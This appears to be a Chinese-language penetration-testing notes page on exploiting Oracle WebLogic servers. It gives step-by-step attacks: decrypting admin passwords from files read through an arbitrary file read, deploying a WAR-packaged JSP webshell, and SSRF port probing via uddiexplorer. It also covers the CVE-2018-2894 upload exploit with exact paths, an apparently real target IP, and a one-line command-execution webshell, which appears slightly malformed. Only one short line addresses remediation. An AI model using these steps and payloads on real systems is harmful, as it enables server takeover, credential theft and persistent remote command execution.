Weblogic漏洞
弱口令
User ID system |
任意文件读取基础上的后台密码破解
假设我们能前台任意文件读取,但是后台的账户密码是加密的.如何破解
weblogic新版本用的是AES加密,老版本用的是3DES加密
都是对称加密,有密钥就可解
假设前台可以任意文件读取,那么我们只要用到用户的密文和加密的密钥即可破解。这两个文件在base_domain下, 为./security/SerializedSystemIni.dat和config/config.xml
这里值得一提的是,.dat文件是二进制文件,建议burp打开不然容易乱码
把二进制信息copy to file保存下来.
获取config.xml
xml文档里这才是管理员账户
开始解密,这里使用的是 https://github.com/TideSec/Decrypt_Weblogic_Password 中的tools5
解密成功。登录就完事了
后台传木马提权
后台传jsp木马的war包就行了
怎么生成war包:
jar cvf shell.war 木马源文件
部署-》安装-》上载文件-》选择文件选择war包-》一直下一步然后完成
访问war包目录下的木马文件即可
马子是一句话马子 <%Runtime.getRuntime.exec(request.getParameter(“cmd”));%>
命令建议用这个网站编码一下,不然有可能不会执行 http://www.jackson-t.ca/runtime-exec-payloads.html
weblogic uudi组件造成的端口探测
若weblogic加载了uudi组件,那么在 /uddiexplorer/SearchPublicRegistries.jsp 会存在端口探测问题
对该jsp传参
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 |
我们通过改变operator的端口发包,看页面变化即可端口探测
端口不存在,就会有could not connect over HTTP to server:
存在就有404 error code (Not Found). Please ensure that your URL is correct,
Weblogic 任意文件上传漏洞(CVE-2018-2894)
WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do
影响版本 Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。
前提条件:管理员在后台 ->base_domain->配置->一般信息->高级,把这个勾选了
开启后我们来到 http://ip:port/ws_utc/config.do ,把这个改为
路径 /user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
然后点安全,再点添加,把我们的jsp马传上去
抓包,获取该木马的时间戳
访问
http://123.57.137.109:7001/ws_utc/css/config/keystore/时间戳_文件名
成功访问我的马儿
修复: 设置Config.do、begin.do页面登录授权后访问 ,升级,加waf
wechat
